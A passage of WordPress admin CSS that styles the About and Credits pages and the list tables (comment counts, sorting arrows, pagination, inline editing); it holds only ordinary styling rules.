.column:nth-of-type(odd){grid-column-start:2;grid-column-end:span 3}.about__section.has-overlap-style .column:nth-of-type(2n){grid-column-start:4;grid-column-end:span 3}.about__section.has-overlap-style .column.is-top-layer{z-index:1}@media screen and (max-width:782px){.about__section.has-2-columns.is-wider-left,.about__section.has-2-columns.is-wider-right,.about__section.has-3-columns{display:block;margin-bottom:calc(var(--gap)/ 2)}.about__section .column:not(.is-edge-to-edge){padding-top:var(--gap);padding-bottom:var(--gap)}.about__section.has-2-columns.has-gutters.is-wider-left,.about__section.has-2-columns.has-gutters.is-wider-right,.about__section.has-3-columns.has-gutters{margin-bottom:calc(var(--gap) * 2)}.about__section.has-2-columns.has-gutters .column,.about__section.has-3-columns.has-gutters .column{margin-bottom:var(--gap)}.about__section.has-2-columns.has-gutters .column:last-child,.about__section.has-3-columns.has-gutters .column:last-child{margin-bottom:0}.about__section.has-3-columns .column:nth-of-type(n){padding-top:calc(var(--gap)/ 2);padding-bottom:calc(var(--gap)/ 2)}.about__section.has-4-columns{grid-template-columns:repeat(2,1fr)}.about__section.has-overlap-style{grid-template-columns:1fr}.about__section.has-overlap-style .column.column{grid-column-start:1;grid-column-end:2;grid-row-start:1;grid-row-end:2}}@media screen and (max-width:600px){.about__section.has-2-columns{display:block;margin-bottom:var(--gap)}.about__section.has-2-columns:not(.has-gutters) .column:nth-of-type(n){padding-top:calc(var(--gap)/ 2);padding-bottom:calc(var(--gap)/ 2)}.about__section.has-2-columns.has-gutters{margin-bottom:calc(var(--gap) * 2)}.about__section.has-2-columns.has-gutters .column{margin-bottom:var(--gap)}.about__section.has-2-columns.has-gutters .column:last-child{margin-bottom:0}.about__section .column.is-left-padding-zero{padding-left:0}.about__section .column.is-right-padding-zero{padding-right:0}}@media screen and (max-width:480px){.about__section .is-section-header,.about__section.is-feature .column{padding:0}.about__section.has-4-columns{display:block;padding-bottom:calc(var(--gap)/ 2)}.about__section.has-4-columns.has-gutters .column{margin-bottom:calc(var(--gap)/ 2)}.about__section.has-4-columns.has-gutters .column:last-child{margin-bottom:0}.about__section.has-4-columns .column:nth-of-type(n){padding-top:calc(var(--gap)/ 2);padding-bottom:calc(var(--gap)/ 2)}}.about__container{line-height:1.4;color:var(--text)}.about__container h1{padding:0}.about__container h1,.about__container h2,.about__container h3.is-larger-heading{margin-top:0;margin-bottom:calc(.5 * var(--gap));font-size:2rem;font-weight:700;line-height:1.16}.about__container h1.is-smaller-heading,.about__container h2.is-smaller-heading,.about__container h3{margin-top:0;margin-bottom:calc(.5 * var(--gap));font-size:1.625rem;font-weight:700;line-height:1.4}.about__container h3.is-smaller-heading,.about__container h4{margin-top:0;font-size:1.125rem;font-weight:600;line-height:1.6}.about__container h1,.about__container h2,.about__container h3,.about__container h4{text-wrap:pretty;color:inherit}.about__container :is(h1,h2,h3,h4,.about__header-text):lang(en){text-wrap:balance}.about__container p{text-wrap:pretty}.about__container p{font-size:inherit;line-height:inherit}.about__container p.is-subheading{margin-top:0;margin-bottom:1rem;font-size:1.5rem;font-weight:300;line-height:160%}.about__section a{color:var(--accent-1);text-decoration:underline}.about__section a:active,.about__section a:focus,.about__section a:hover{color:var(--accent-1);text-decoration:none}.wp-credits-list a{text-decoration:none}.wp-credits-list a:active,.wp-credits-list a:focus,.wp-credits-list a:hover{text-decoration:underline}.about__section a.button.button-hero{padding-top:1.1875rem;padding-bottom:1.1875rem;font-size:1.5rem;line-height:1.4;white-space:normal;text-wrap:pretty}.about__container ul{list-style:disc;margin-right:calc(var(--gap)/ 2)}.about__container li{margin-bottom:.5rem}.about__container img{margin:0;max-width:100%;vertical-align:middle}.about__container .about__image{margin:0}.about__container .about__image img{max-width:100%;width:100%;height:auto;border-radius:var(--border-radius)}.about__container .about__image figcaption{margin-top:.5em;text-align:center}.about__container .about__image .wp-video{margin-right:auto;margin-left:auto}.about__container .about__image svg{vertical-align:middle}.about__container .about__image+h3{margin-top:calc(.75 * var(--gap))}.about__container hr{margin:calc(var(--gap)/ 2) var(--gap);height:0;border:none;border-top:4px solid var(--accent-3)}.about__container hr.is-small{margin-top:0;margin-bottom:0}.about__container hr.is-large{margin:var(--gap) auto}.about__container hr.is-invisible{border:none}.about__container .notice,.about__container div.error,.about__container div.updated{display:none!important}.about__container code{font-size:inherit}.about__section{font-size:1.125rem;line-height:1.55}.about__section.is-feature{font-size:1.6em}.about__section.has-3-columns,.about__section.has-4-columns{font-size:1rem}@media screen and (max-width:480px){.about__section.is-feature{font-size:1.4em}.about__container h1,.about__container h2,.about__container h3.is-larger-heading{font-size:2em}}.about__header{position:relative;display:flex;flex-direction:column;align-items:flex-start;justify-content:flex-end;box-sizing:border-box;padding:calc(var(--gap) * 1.5);padding-left:26rem;min-height:clamp(10rem,25vw,18.75rem);border-radius:var(--border-radius);background-image:url("../images/about-header-default.webp?ver=20260514");background-repeat:no-repeat;background-position:left center;background-size:cover;background-color:var(--background);color:var(--text-light)}.credits-php .about__header{background-image:url("../images/about-header-credits.webp?ver=20260514")}.freedoms-php .about__header{background-image:url("../images/about-header-freedoms.webp?ver=20260514")}.privacy-php .about__header{background-image:url("../images/about-header-privacy.webp?ver=20260514")}.contribute-php .about__header{background-image:url("../images/about-header-get-involved.webp?ver=20260514")}[dir=rtl] .about__header{background-image:url("../images/about-header-default-rtl.webp?ver=20260514")}[dir=rtl] .credits-php .about__header{background-image:url("../images/about-header-credits-rtl.webp?ver=20260514")}[dir=rtl] .freedoms-php .about__header{background-image:url("../images/about-header-freedoms-rtl.webp?ver=20260514")}[dir=rtl] .privacy-php .about__header{background-image:url("../images/about-header-privacy-rtl.webp?ver=20260514")}[dir=rtl] .contribute-php .about__header{background-image:url("../images/about-header-get-involved-rtl.webp?ver=20260514")}.about__header-image{margin:0 0 calc(var(--gap) * 1.5)}.about__header-title{box-sizing:border-box;margin:0;padding:0}.about__header-title h1{margin:0;padding:0;font-size:clamp(2rem, 20vw - 9rem, 4rem);line-height:1;font-weight:600;color:var(--text)}.about-php .about__header-title h1,.contribute-php .about__header-title h1,.credits-php .about__header-title h1,.freedoms-php .about__header-title h1,.privacy-php .about__header-title h1{font-size:clamp(2rem, 20vw - 9rem, 4rem)}.about__header-text{box-sizing:border-box;max-width:26em;margin:1rem 0 0;padding:0;font-size:1.6rem;line-height:1.15;color:var(--text)}.about__header-navigation{position:relative;z-index:1;display:flex;flex-wrap:wrap;justify-content:space-between;padding-top:0;margin-bottom:var(--gap);background:var(--nav-background);color:var(--nav-color);border-bottom:3px solid var(--nav-border)}.about__header-navigation::after{display:none}.about__header-navigation .nav-tab{margin-right:0;padding:calc(var(--gap) * .75) var(--gap);float:none;font-size:1.4em;line-height:1;border-width:0 0 3px;border-style:solid;border-color:transparent;background:0 0;color:inherit}.about__header-navigation .nav-tab:active,.about__header-navigation .nav-tab:hover{background-color:var(--nav-current);color:var(--text-light);border-radius:var(--border-radius)}.about__header-navigation .nav-tab-active{margin-bottom:-3px;color:var(--nav-current);border-width:0 0 6px;border-color:var(--nav-current)}.about__header-navigation .nav-tab-active:active,.about__header-navigation .nav-tab-active:hover{background-color:var(--nav-current);color:var(--text-light);border-color:var(--nav-current);border-radius:var(--border-radius)}@media screen and (max-width:960px){.about__header{padding-left:21rem}.about-php .about__header-title h1,.contribute-php .about__header-title h1,.credits-php .about__header-title h1,.freedoms-php .about__header-title h1,.privacy-php .about__header-title h1{font-size:clamp(2rem, 20vw - 9rem, 4rem)}.about__header-navigation .nav-tab{padding:calc(var(--gap) * .75) calc(var(--gap) * .5)}}@media screen and (max-width:782px){.about__container .about__header-text{font-size:1.4em}.about__header-container{display:block}.about__header{padding:var(--gap);padding-left:17rem}.about__header-text{margin-top:.5rem}.about__header-navigation .nav-tab{margin-top:0;margin-left:0;font-size:1.2em}}@media screen and (max-width:600px){.about__header{min-height:auto;padding-left:var(--gap)}.about__header-navigation{display:block}.about__header-navigation .nav-tab{display:block;margin-bottom:0;padding:calc(var(--gap)/ 2);border-right-width:6px;border-bottom:none}.about__header-navigation .nav-tab-active{border-bottom:none;border-right-width:6px}}.about__section .wp-people-group-title{margin-bottom:calc(var(--gap) * 2 - 10px);text-align:center}.about__section .wp-people-group{margin:0;display:flex;flex-wrap:wrap}.about__section .wp-person{display:inline-block;vertical-align:top;box-sizing:border-box;margin-bottom:calc(var(--gap) - 10px);width:25%;text-align:center}.about__section .compact .wp-person{height:auto;width:20%}.about__section .wp-person-avatar{display:block;margin:0 auto calc(var(--gap)/ 2);width:140px;height:140px;border-radius:100%;overflow:hidden}.about__section .wp-person .gravatar{width:140px;height:140px;filter:grayscale(100%)}.about__section .compact .wp-person .gravatar,.about__section .compact .wp-person-avatar{width:80px;height:80px}.about__section .wp-person .web{display:block;font-size:1.4em;font-weight:600;padding:10px 10px 0;text-decoration:none}.about__section .wp-person .web:hover{text-decoration:underline}.about__section .compact .wp-person .web{font-size:1.2em}.about__section .wp-person .title{display:block;margin-top:.5em}@media screen and (max-width:782px){.about__section .wp-person{width:33%}.about__section .compact .wp-person{width:25%}.about__section .wp-person .gravatar,.about__section .wp-person-avatar{width:120px;height:120px}}@media screen and (max-width:600px){.about__section .wp-person{width:50%}.about__section .compact .wp-person{width:33%}.about__section .wp-person .web{font-size:1.2em}}@media screen and (max-width:480px){.about__section .wp-person{min-width:100%}.about__section .wp-person .web{font-size:1em}.about__section .compact .wp-person .web{font-size:1em}}.about__section .column .freedom-image{margin-bottom:var(--gap);max-height:180px}.about__section .column .privacy-image{display:block;margin-right:auto;margin-left:auto;max-width:25rem}.about-wrap{position:relative;margin:25px 20px 0 40px;max-width:1050px;font-size:15px}.about-wrap.full-width-layout{max-width:1200px}.about-wrap-content{max-width:1050px}.about-wrap .notice,.about-wrap div.error,.about-wrap div.updated{display:none!important}.about-wrap hr{border:0;height:0;margin:3em 0 0;border-top:1px solid rgba(0,0,0,.1)}.about-wrap img{margin:0;width:100%;height:auto;vertical-align:middle}.about-wrap .inline-svg img{max-width:100%;width:auto;height:auto}.about-wrap video{margin:1.5em auto}.wp-badge{background:#0073aa url(../images/w-logo-white.png?ver=20160308) no-repeat;background-position:center 25px;background-size:80px 80px;color:#fff;font-size:14px;text-align:center;font-weight:600;margin:5px 0 0;padding-top:120px;height:40px;display:inline-block;width:140px;text-rendering:optimizeLegibility;box-shadow:0 1px 3px rgba(0,0,0,.2)}.svg .wp-badge{background-image:url(../images/wordpress-logo-white.svg?ver=20160308)}.about-wrap .wp-badge{position:absolute;top:0;left:0}.about-wrap .nav-tab{padding-left:15px;padding-right:15px;font-size:18px;line-height:1.33333333}.about-wrap h1{margin:.2em 0 0 200px;padding:0;color:#32373c;line-height:1.2;font-size:2.8em;font-weight:400}.about-wrap h2{margin:40px 0 .6em;font-size:2.7em;line-height:1.3;font-weight:300;text-align:center}.about-wrap h3{margin:1.25em 0 .6em;font-size:1.4em;line-height:1.5}.about-wrap h4{font-size:16px;color:#23282d}.about-wrap p{line-height:1.5;font-size:16px}.about-wrap code,.about-wrap ol li p{font-size:14px;font-weight:400}.about-wrap figcaption{font-size:13px;text-align:center;color:#fff;text-overflow:ellipsis}.about-wrap .about-description,.about-wrap .about-text{margin-top:1.4em;font-weight:400;line-height:1.6;font-size:19px}.about-wrap .about-text{margin:1em 0 1em 200px;color:#555d66}.about-wrap .has-1-columns,.about-wrap .has-2-columns,.about-wrap .has-3-columns,.about-wrap .has-4-columns{display:grid;max-width:800px;margin-top:40px;margin-right:auto;margin-left:auto}.about-wrap .column{margin-left:20px;margin-right:20px}.about-wrap .is-wide{max-width:760px}.about-wrap .is-fullwidth{max-width:100%}.about-wrap .has-1-columns{display:block;max-width:680px;margin:0 auto 40px}.about-wrap .has-2-columns{grid-template-columns:1fr 1fr}.about-wrap .has-2-columns .column:nth-of-type(odd){grid-column-start:1}.about-wrap .has-2-columns .column:nth-of-type(2n){grid-column-start:2}.about-wrap .has-2-columns.is-wider-right{grid-template-columns:1fr 2fr}.about-wrap .has-2-columns.is-wider-left{grid-template-columns:2fr 1fr}.about-wrap .has-3-columns{grid-template-columns:repeat(3,1fr)}.about-wrap .has-3-columns .column:nth-of-type(3n+1){grid-column-start:1}.about-wrap .has-3-columns .column:nth-of-type(3n+2){grid-column-start:2}.about-wrap .has-3-columns .column:nth-of-type(3n){grid-column-start:3}.about-wrap .has-4-columns{grid-template-columns:repeat(4,1fr)}.about-wrap .has-4-columns .column:nth-of-type(4n+1){grid-column-start:1}.about-wrap .has-4-columns .column:nth-of-type(4n+2){grid-column-start:2}.about-wrap .has-4-columns .column:nth-of-type(4n+3){grid-column-start:3}.about-wrap .has-4-columns .column:nth-of-type(4n){grid-column-start:4}.about-wrap .column :first-child{margin-top:0}.about-wrap .aligncenter{text-align:center}.about-wrap .alignleft{float:right;margin-left:40px}.about-wrap .alignright{float:left;margin-right:40px}.about-wrap .is-vertically-aligned-top{align-self:flex-start}.about-wrap .is-vertically-aligned-center{align-self:center}.about-wrap .is-vertically-aligned-bottom{align-self:end}.about-wrap .point-releases{margin-top:5px;border-bottom:1px solid #ddd}.about-wrap .changelog{margin-bottom:40px}.about-wrap .changelog.point-releases h3{padding-top:35px}.about-wrap .changelog.point-releases h3:first-child{padding-top:7px}.about-wrap .changelog.feature-section .col{margin-top:40px}.about-wrap .lead-description{font-size:1.5em;text-align:center}.about-wrap .feature-section p{margin-top:.6em}.about-wrap .headline-feature{margin:0 auto 40px;max-width:680px}.about-wrap .headline-feature h2{margin:50px 0 0}.about-wrap .headline-feature img{max-width:600px;width:100%}.about-wrap .return-to-dashboard{margin:30px -5px 0 0;font-size:14px;font-weight:600}.about-wrap .return-to-dashboard a{text-decoration:none;padding:0 5px}.about-wrap h2.wp-people-group{margin:2.6em 0 1.33em;padding:0;font-size:16px;line-height:inherit;font-weight:600;text-align:right}.about-wrap .wp-people-group{padding:0 5px;margin:0 -5px 0 -15px}.about-wrap .compact{margin-bottom:0}.about-wrap .wp-person{display:inline-block;vertical-align:top;margin-left:10px;padding-bottom:15px;height:70px;width:280px}.about-wrap .compact .wp-person{height:auto;width:180px;padding-bottom:0;margin-bottom:0}.about-wrap .wp-person .gravatar{float:right;margin:0 0 10px 10px;padding:1px;width:60px;height:60px}.about-wrap .compact .wp-person .gravatar{width:30px;height:30px}.about-wrap .wp-person .web{margin:6px 0 2px;font-size:16px;font-weight:400;line-height:2;text-decoration:none}.about-wrap .wp-person .title{display:block}.about-wrap #wp-people-group-validators+p.wp-credits-list{margin-top:0}.about-wrap p.wp-credits-list a{white-space:nowrap}.freedoms-php .about-wrap ol{margin:40px 60px}.freedoms-php .about-wrap ol li{list-style-type:decimal;font-weight:600}.freedoms-php .about-wrap ol p{font-weight:400;margin:.6em 0}@media screen and (max-width:782px){.about-wrap .has-3-columns,.about-wrap .has-4-columns{grid-template-columns:1fr 1fr}.about-wrap .has-3-columns .column:nth-of-type(3n+1),.about-wrap .has-4-columns .column:nth-of-type(4n+1){grid-column-start:1;grid-row-start:1}.about-wrap .has-3-columns .column:nth-of-type(3n+2),.about-wrap .has-4-columns .column:nth-of-type(4n+2){grid-column-start:2;grid-row-start:1}.about-wrap .has-3-columns .column:nth-of-type(3n),.about-wrap .has-4-columns .column:nth-of-type(4n+3){grid-column-start:1;grid-row-start:2}.about-wrap .has-4-columns .column:nth-of-type(4n){grid-column-start:2;grid-row-start:2}}@media screen and (max-width:600px){.about-wrap .has-2-columns,.about-wrap .has-3-columns,.about-wrap .has-4-columns{display:block}.about-wrap :not(.is-wider-right):not(.is-wider-left) .column{margin-left:0;margin-right:0}.about-wrap .has-2-columns.is-wider-left,.about-wrap .has-2-columns.is-wider-right{display:grid}}@media only screen and (max-width:500px){.about-wrap{margin-left:20px;margin-right:10px}.about-wrap .about-text,.about-wrap h1{margin-left:0}.about-wrap .about-text{margin-bottom:.25em}.about-wrap .wp-badge{position:relative;margin-bottom:1.5em;width:100%}}@media only screen and (max-width:480px){.about-wrap .has-2-columns.is-wider-left,.about-wrap .has-2-columns.is-wider-right{display:block}.about-wrap .column{margin-left:0;margin-right:0}.about-wrap .has-2-columns.is-wider-left img,.about-wrap .has-2-columns.is-wider-right img{max-width:160px}}.response-links { display: block; margin-bottom: 1em; } .response-links a { display: block; } .response-links a.comments-edit-item-link { font-weight: 600; } .response-links a.comments-view-item-link { font-size: 12px; } .post-com-count-wrapper strong { font-weight: 400; } .comments-view-item-link { display: inline-block; clear: both; } .column-response .post-com-count-wrapper, .column-comments .post-com-count-wrapper { white-space: nowrap; word-wrap: normal; } /* comments bubble common */ .column-response .post-com-count, .column-comments .post-com-count { display: inline-block; vertical-align: top; } /* comments bubble approved */ .column-response .post-com-count-no-comments, .column-response .post-com-count-approved, .column-comments .post-com-count-no-comments, .column-comments .post-com-count-approved { margin-top: 5px; } .column-response .comment-count-no-comments, .column-response .comment-count-approved, .column-comments .comment-count-no-comments, .column-comments .comment-count-approved { box-sizing: border-box; display: block; padding: 0 8px; min-width: 24px; height: 2em; border-radius: 5px; background-color: #646970; color: #fff; font-size: 11px; line-height: 1.90909090; text-align: center; } .column-response .post-com-count-no-comments:after, .column-response .post-com-count-approved:after, .column-comments .post-com-count-no-comments:after, .column-comments .post-com-count-approved:after { content: ""; display: block; margin-left: 8px; width: 0; height: 0; border-top: 5px solid #646970; border-right: 5px solid transparent; } .column-response a.post-com-count-approved:hover .comment-count-approved, .column-response a.post-com-count-approved:focus .comment-count-approved, .column-comments a.post-com-count-approved:hover .comment-count-approved, .column-comments a.post-com-count-approved:focus .comment-count-approved { background: #3858e9; } .column-response a.post-com-count-approved:hover:after, .column-response a.post-com-count-approved:focus:after, .column-comments a.post-com-count-approved:hover:after, .column-comments a.post-com-count-approved:focus:after { border-top-color: #3858e9; } /* @todo: consider to use a single rule for these counters and the admin menu counters. */ .column-response .post-com-count-pending, .column-comments .post-com-count-pending { position: relative; left: -3px; padding: 0 5px; min-width: 7px; height: 17px; border: 2px solid #fff; border-radius: 11px; background: #d63638; color: #fff; font-size: 9px; line-height: 1.88888888; text-align: center; } .column-response .post-com-count-no-pending, .column-comments .post-com-count-no-pending { display: none; } /* comments */ .commentlist li { padding: 1em 1em .2em; margin: 0; border-bottom: 1px solid #c3c4c7; } .commentlist li li { border-bottom: 0; padding: 0; } .commentlist p { padding: 0; margin: 0 0 .8em; } #submitted-on, .submitted-on { color: #50575e; } /* reply to comments */ #replyrow td { padding: 2px; } #replysubmit { margin: 0; padding: 5px 7px 10px; overflow: hidden; } #replysubmit .reply-submit-buttons { margin-bottom: 0; } #replysubmit .button { margin-right: 5px; } #replysubmit .spinner { float: none; margin: -4px 0 0; } #replyrow.inline-edit-row fieldset.comment-reply { font-size: inherit; line-height: inherit; } #replyrow legend { margin: 0; padding: .2em 5px 0; font-size: 13px; line-height: 1.4; font-weight: 600; } #replyrow.inline-edit-row label { display: inline; vertical-align: baseline; line-height: inherit; } #edithead .inside, #commentsdiv #edithead .inside { float: left; padding: 3px 0 2px 5px; margin: 0; text-align: center; } #edithead .inside input { width: 180px; } #edithead label { padding: 2px 0; } #replycontainer { padding: 5px; } #replycontent { height: 120px; box-shadow: none; } #replyerror { border-color: #dcdcde; background-color: #f6f7f7; } /* @todo: is this used? */ .commentlist .avatar { vertical-align: text-top; } #the-comment-list tr.undo, #the-comment-list div.undo { background-color: #f6f7f7; } #the-comment-list .unapproved th, #the-comment-list .unapproved td { background-color: #fcf9e8; } #the-comment-list .unapproved th.check-column { border-left: 4px solid #d63638; } #the-comment-list .unapproved th.check-column input { margin-left: 4px; } #the-comment-list .approve a { color: #007017; } #the-comment-list .unapprove a { color: #996800; } #the-comment-list th, #the-comment-list td { box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.1); } #the-comment-list tr:last-child th, #the-comment-list tr:last-child td { box-shadow: none; } #the-comment-list tr.unapproved + tr.approved th, #the-comment-list tr.unapproved + tr.approved td { border-top: 1px solid rgba(0, 0, 0, 0.03); } /* table vim shortcuts */ .vim-current, .vim-current th, .vim-current td { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08) !important; } th .comment-grey-bubble { width: 16px; /* Make sure the link clickable area fills the entire table header. */ position: relative; top: 2px; } th .comment-grey-bubble:before { content: "\f101"; content: "\f101" / ''; font: normal 20px/.5 dashicons; display: inline-block; padding: 0; top: 4px; left: -4px; position: relative; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #3c434a; } /*------------------------------------------------------------------------------ 10.0 - List Posts (/Pages/etc) ------------------------------------------------------------------------------*/ table.fixed { table-layout: fixed; } .fixed .column-rating, .fixed .column-visible { width: 8%; } .fixed .column-posts, .fixed .column-parent, .fixed .column-links, .fixed .column-author, .fixed .column-format { width: 10%; } .fixed .column-date { width: 14%; } .column-date span[title] { -webkit-text-decoration: dotted underline; text-decoration: dotted underline; } .fixed .column-posts { width: 74px; } .fixed .column-role, .fixed .column-posts { hyphens: auto; } .fixed .column-comment .comment-author { display: none; } .fixed .column-response, .fixed .column-categories, .fixed .column-tags, .fixed .column-rel, .fixed .column-role { width: 15%; } .fixed .column-slug { width: 25%; } .fixed .column-locations { width: 35%; } .fixed .column-comments { width: 5.5em; text-align: left; } .fixed .column-comments .vers { padding-left: 3px; } td.column-title strong, td.plugin-title strong { display: block; margin-bottom: .2em; font-size: 14px; } td.column-title p, td.plugin-title p { margin: 6px 0; } /* Media file column */ table.media .column-title .media-icon { float: left; min-height: 60px; margin: 0 9px 0 0; } table.media .column-title .media-icon img { max-width: 60px; height: auto; vertical-align: top; /* Remove descender white-space. */ } table.media .column-title .has-media-icon ~ .row-actions { margin-left: 70px; /* 60px image + margin */ } table.media .column-title .filename { margin-bottom: 0.2em; } /* Media Copy to clipboard row action */ .media .row-actions .copy-to-clipboard-container { display: inline; position: relative; } .media .row-actions .copy-to-clipboard-container .success { position: absolute; left: 50%; transform: translate(-50%, -100%); background: #000; color: #fff; border-radius: 5px; margin: 0; padding: 2px 5px; } /* @todo: pick a consistent list table selector */ .wp-list-table a { transition: none; } #the-list tr:last-child td, #the-list tr:last-child th { border-bottom: none !important; box-shadow: none; } #comments-form .fixed .column-author { width: 20%; } #commentsdiv.postbox .inside { margin: 0; padding: 0; } #commentsdiv .inside .row-actions { line-height: 1.38461538; } #commentsdiv .inside .column-author { width: 25%; } #commentsdiv .column-comment p { margin: 0.6em 0; padding: 0; } #commentsdiv #replyrow td { padding: 0; } #commentsdiv p { padding: 8px 10px; margin: 0; } #commentsdiv .comments-box { border: 0 none; } #commentsdiv .comments-box thead th, #commentsdiv .comments-box thead td { background: transparent; padding: 0 7px 4px; } #commentsdiv .comments-box tr:last-child td { border-bottom: 0 none; } #commentsdiv #edithead .inside input { width: 160px; } .sorting-indicators { display: grid; } .sorting-indicator { display: block; width: 10px; height: 4px; margin-top: 4px; margin-left: 7px; } .sorting-indicator:before { font: normal 20px/1 dashicons; display: inline-block; padding: 0; top: -4px; left: -8px; line-height: 0.5; position: relative; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none !important; color: #a7aaad; } .sorting-indicator.asc:before { content: "\f142"; content: "\f142" / ''; } .sorting-indicator.desc:before { content: "\f140"; content: "\f140" / ''; } th.sorted.desc .sorting-indicator.desc:before { color: #1d2327; } th.sorted.asc .sorting-indicator.asc:before { color: #1d2327; } th.sorted.asc a:focus .sorting-indicator.asc:before, th.sorted.asc:hover .sorting-indicator.asc:before, th.sorted.desc a:focus .sorting-indicator.desc:before, th.sorted.desc:hover .sorting-indicator.desc:before { color: #a7aaad; } th.sorted.asc a:focus .sorting-indicator.desc:before, th.sorted.asc:hover .sorting-indicator.desc:before, th.sorted.desc a:focus .sorting-indicator.asc:before, th.sorted.desc:hover .sorting-indicator.asc:before { color: #1d2327; } .wp-list-table .toggle-row { position: absolute; right: 8px; top: 10px; display: none; padding: 0; width: 40px; height: 40px; border: none; outline: none; background: transparent; } .wp-list-table .toggle-row:hover { cursor: pointer; } .wp-list-table .toggle-row:focus:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-list-table .toggle-row:active { box-shadow: none; } .wp-list-table .toggle-row:before { position: absolute; top: -5px; left: 10px; border-radius: 50%; display: block; padding: 1px 2px 1px 0; color: #3c434a; /* same as table headers sort arrows */ content: "\f140"; content: "\f140" / ''; font: normal 20px/1 dashicons; line-height: 1; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-list-table .is-expanded .toggle-row:before { content: "\f142"; content: "\f142" / ''; } .check-column { position: relative; } .check-column label { box-sizing: border-box; width: 100%; height: 100%; display: block; position: absolute; top: 0; left: 0; } .check-column input { position: relative; z-index: 1; } .check-column .label-covers-full-cell:hover + input:not(:disabled) { box-shadow: 0 0 0 1px #2271b1; } .check-column label:hover, .check-column input:hover + label { background: rgba(0, 0, 0, 0.05); } .locked-indicator { display: none; margin-left: 6px; height: 20px; width: 16px; } .locked-indicator-icon:before { color: #8c8f94; content: "\f160"; content: "\f160" / ''; display: inline-block; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .locked-info { display: none; margin-top: 4px; } .locked-text { vertical-align: top; } .wp-locked .locked-indicator, .wp-locked .locked-info { display: block; } tr.wp-locked .check-column label, tr.wp-locked .check-column input[type="checkbox"], tr.wp-locked .row-actions .inline, tr.wp-locked .row-actions .trash { display: none; } #menu-locations-wrap .widefat { width: 60%; } .widefat th.sortable, .widefat th.sorted { padding: 0; } th.sortable a, th.sorted a { display: block; overflow: hidden; padding: 8px; } th.sortable a:focus, th.sorted a:focus { border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } th.sortable a span, th.sorted a span { float: left; cursor: pointer; } .tablenav-pages .current-page { vertical-align: top; margin: 0 2px 0 0; font-size: 13px; text-align: center; min-height: 32px; padding: 0 8px; } .tablenav .total-pages { margin-right: 2px; } .tablenav #table-paging { margin-left: 2px; } .tablenav { clear: both; height: 32px; margin: 6px 0 4px; vertical-align: middle; } .tablenav.themes { max-width: 98%; } .tablenav .tablenav-pages { float: right; margin: 0 0 9px; } .tablenav .no-pages, .tablenav .one-page .pagination-links { display: none; } .tablenav .tablenav-pages .button, .tablenav .tablenav-pages .tablenav-pages-navspan { display: inline-block; vertical-align: baseline; min-width: 32px; min-height: 32px; margin: 0; padding: 0 4px; font-size: 16px; line-height: 1.875; /* 30px for 32px height */ text-align: center; } .tablenav .displaying-num { margin-right: 7px; } .tablenav .one-page .displaying-num { display: inline-block; margin: 5px 0; } .tablenav .actions { padding: 0 8px 0 0; } .wp-filter .actions { display: inline-block; vertical-align: middle; } .tablenav .delete { margin-right: 20px; } /* This view-switcher is still used on multisite. */ .tablenav .view-switch { float: right; margin: 0 5px; padding-top: 3px; } .wp-filter .view-switch { display: inline-block; vertical-align: middle; padding: 12px 0; margin: 0 8px 0 2px; } .media-toolbar.wp-filter .view-switch { margin: 0 12px 0 2px; } .view-switch a { float: left; width: 28px; height: 28px; text-align: center; line-height: 1.84615384; text-decoration: none; } .view-switch a:before { color: #c3c4c7; display: inline-block; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .view-switch a:hover:before, .view-switch a:focus:before { color: #787c82; } .view-switch a.current:before { color: #2271b1; } .view-switch .view-list:before { content: "\f163"; content: "\f163" / ''; } .view-switch .view-excerpt:before { content: "\f164"; content: "\f164" / ''; } .view-switch .view-grid:before { content: "\f509"; content: "\f509" / ''; } .filter { float: left; margin: -5px 0 0 10px; } .filter .subsubsub { margin-left: -10px; margin-top: 13px; } .screen-per-page { width: 4em; } #posts-filter .wp-filter { margin-bottom: 0; } #posts-filter fieldset { float: left; margin: 0 1.5ex 1em 0; padding: 0; } #posts-filter fieldset legend { padding: 0 0 .2em 1px; } p.pagenav { margin: 0; display: inline; } .pagenav span { font-weight: 600; margin: 0 6px; } .row-title { font-size: 14px !important; font-weight: 600; } .column-comment .comment-author { margin-bottom: 0.6em; } .column-author img, .column-username img, .column-comment .comment-author img { float: left; margin-right: 10px; margin-top: 1px; } .row-actions { color: #646970; font-size: 13px; padding: 2px 0 0; position: relative; left: -9999em; } /* ticket #34150 */ .rtl .row-actions a { display: inline-block; } .row-actions .network_only, .row-actions .network_active { color: #000; } .no-js .row-actions, tr:hover .row-actions, .mobile .row-actions, .row-actions.visible, .comment-item:hover .row-actions { position: static; } /* deprecated */ .row-actions-visible { padding: 2px 0 0; } /*------------------------------------------------------------------------------ 10.1 - Inline Editing ------------------------------------------------------------------------------*/ /* .quick-edit* is for Quick Edit .bulk-edit* is for Bulk Edit .inline-edit* is for everything */ /* Layout */ #wpbody-content .inline-edit-row fieldset { float: left; margin: 0; padding: 0 12px 0 0; width: 100%; box-sizing: border-box; } #wpbody-content .inline-edit-row td fieldset:last-of-type { padding-right: 0; } tr.inline-edit-row td { padding: 0; /* Prevents the focus style on .inline-edit-wrapper from being cut-off */ position: relative; } .inline-edit-wrapper { display: flow-root; padding: 0 12px; border: 1px solid transparent; border-radius: 4px; } .inline-edit-wrapper:focus { border-color: var(--wp-admin-theme-color, #3858e9); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #wpbody-content .quick-edit-row-post .inline-edit-col-left { width: 40%; } #wpbody-content .quick-edit-row-post .inline-edit-col-right { width: 39%; } #wpbody-content .inline-edit-row-post 